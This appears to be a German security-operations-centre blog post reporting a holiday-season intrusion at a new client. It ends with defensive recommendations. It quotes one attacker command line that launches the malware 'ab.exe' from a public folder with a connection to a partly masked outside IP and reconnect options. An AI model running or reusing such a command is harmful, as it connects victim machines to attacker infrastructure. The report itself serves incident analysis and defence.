Ein vor kurzem stattgefundener Angriff zeigte uns ein Mal mehr, die Wichtigkeit von Vorsichtsmaßnahmen und proaktiven Strategien zur Abwehr von Cyberbedrohungen, insbesondere während der Zeit von Feiertagen. Es bestätigt sich die These unseres Beitrags „Hacking on the Beach: Cyberbedrohungen zur Urlaubszeit“ (https://www.csoc.de/hacking-on-the-beach-cyberbedrohungen-zur-urlaubszeit/), der beschreibt, dass Hacker Urlaubszeiten geschickt ausnutzen. Während der Urlaubszeit oder den Feiertagen, wird die digitale Präsenz und Erreichbarkeit oft nicht voll gewährleistet, daher erhöht sich das Risiko eines Cyberangriffes massiv. Der Vorfall im folgenden Bericht startete während der Weihnachtsfeiertage und zeigt wie wichtig die Entscheidung ist, sich in einem SOC aufschalten zu lassen, um durch fortlaufende Überwachung und Analyse potenzielle Bedrohungen zu erkennen.
Wenige Minuten nach Abschluss der Onboarding-Analysen und der Aufschaltung eines neuen Kunden auf unsere Überwachungsleitstelle, erhielten wir einen Alarm mit der Meldung “Suspicious Program Location with Network Connections“. Eine erste Analyse zeigte, dass eine ungewöhnliche EXE-Datei “ab.exe“ aus dem Verzeichnis “C:\Users\Public\“ ausgeführt wurde, die unter anderem “nslookup.exe“ und “whoami.exe“ startete.
Entdeckt wurde auch eine auffällige Befehlszeile:
“cmd.exe /Q /c ab.exe -c 167.71.xxx.xxx:80 -s qqwwee –reconnect 5 1> \\127.0.0.1\ADMIN$\__1702456371.1445622 2>&1“
Dieser Befehl nutzt die Windows-Kommandozeile (cmd.exe) im Quiet-Modus (/Q), was bedeutet, dass keine Ausgaben angezeigt und nach Ausführung automatisch geschlossen werden (/c). Der Hauptteil des Befehls “ab.exe“ ist eine Malware. Die Parameter “-c 167.71.xxx.xxx:80“ lassen darauf schließen, dass “ab.exe“ versucht, eine Verbindung zu der angegebenen IP-Adresse auf Port 80 herzustellen, der typischerweise für HTTP verwendet wird. Das Argument “-s qqwwee“ könnte ein spezifischer Befehl oder Parameter für “ab.exe“ sein, dessen genaue Bedeutung ohne Kenntnis der Funktionsweise des Programms unklar ist.
Die Option “–reconnect 5“ deutet darauf hin, dass das Programm versuchen könnte, bis zu fünf Mal eine Verbindung wiederherzustellen, falls diese unterbrochen wird. Der letzte Teil des Befehls “1> \\127.0.0.1\ADMIN$\__1702456371.1445622 2>&1“ leitet die Standardausgabe (stdout) und Standardfehlerausgabe (stderr) in eine Datei im ADMIN$-Verzeichnis des lokalen Computers um, wobei 127.0.0.1 die Loopback-Adresse des lokalen Computers ist. Diese Umleitung kann dazu verwendet werden, Ausgaben und Fehlermeldungen des “ab.exe“ Programms für eine spätere Analyse zu speichern.
Die Malware “ab.exe“ kann verschiedene gefährliche Aktivitäten ausführen, wie das Umleiten auf unsichere Websites, das Beschädigen der Windows-Registrierung, das Deaktivieren von Sicherheitssoftware und das Ändern von System- sowie Browsereinstellungen. Sie kann auch die Systemleistung und Internetgeschwindigkeit beeinträchtigen und stellt ein Sicherheitsrisiko dar, das zu dauerhaftem Datenverlust und Diebstahl persönlicher Daten führen kann. Die Installation weiterer Malware, die Veränderung von Systemeinstellungen und Öffnen von Sicherheitslücken bzw. Einrichtung von Backdoors sind weitere Aktivitäten.
Mehrere Verbindungen zu diversen IP-Adressen mit schädlichen Reputationen – unter anderem zu “34.107.xxx.xxx“ und “167.71.xxx.xxx“ – wurden festgestellt.
Wir informierten den Kunden unverzüglich über den Vorfall, die kompromittierten Server wurden auf unsere Empfehlung hin isoliert.Unserer ersten Einschätzung nach handelte es sich um einen versuchten Ransomware-Angriff. Daher war die Isolation der Server die empfohlene Handlung, um den Angriff sofort zu stoppen und größeren finanziellen Schaden im Millionenbereich zu verhindern. Wäre die Aufschaltung des Kunden wenige Tage später erfolgt, hätten möglicherweise sämtliche Daten verschlüsselt oder dauerhaft entfernt werden können.
Dieser Angriff zeigt, dass es entscheidend ist immer ein Augenmerk auf die Sicherheitsmaßnahmen zu haben und eine fortlaufende Überwachung zu gewährleisten. Doch schon vorher können Unternehmen einiges beachten, um die Infrastruktur besser zu schützen, das Risiko eines Cyberangriffs zu minimieren und widerstandsfähiger zu werden.
Unsere Handlungsempfehlungen:
• Sicherstellen, dass die Überwachungssysteme auch während der Feiertage aktiv
sind und durch Personal überwacht werden (24/7)
• Klare Pläne und Prozesse für schnelle Reaktionen auf verdächtige Aktivitäten
entwickeln.
• Regelmäßige Schulungen in Cyber-Sicherheit, insbesondere zur Erkennung von
Phishing und anderen Angriffsmethoden.
• Umfassende Überprüfungen zur Identifikation und Behebung von Schwachstellen.
• Effektive Backup- und Wiederherstellungspläne für den Fall eines Angriffs.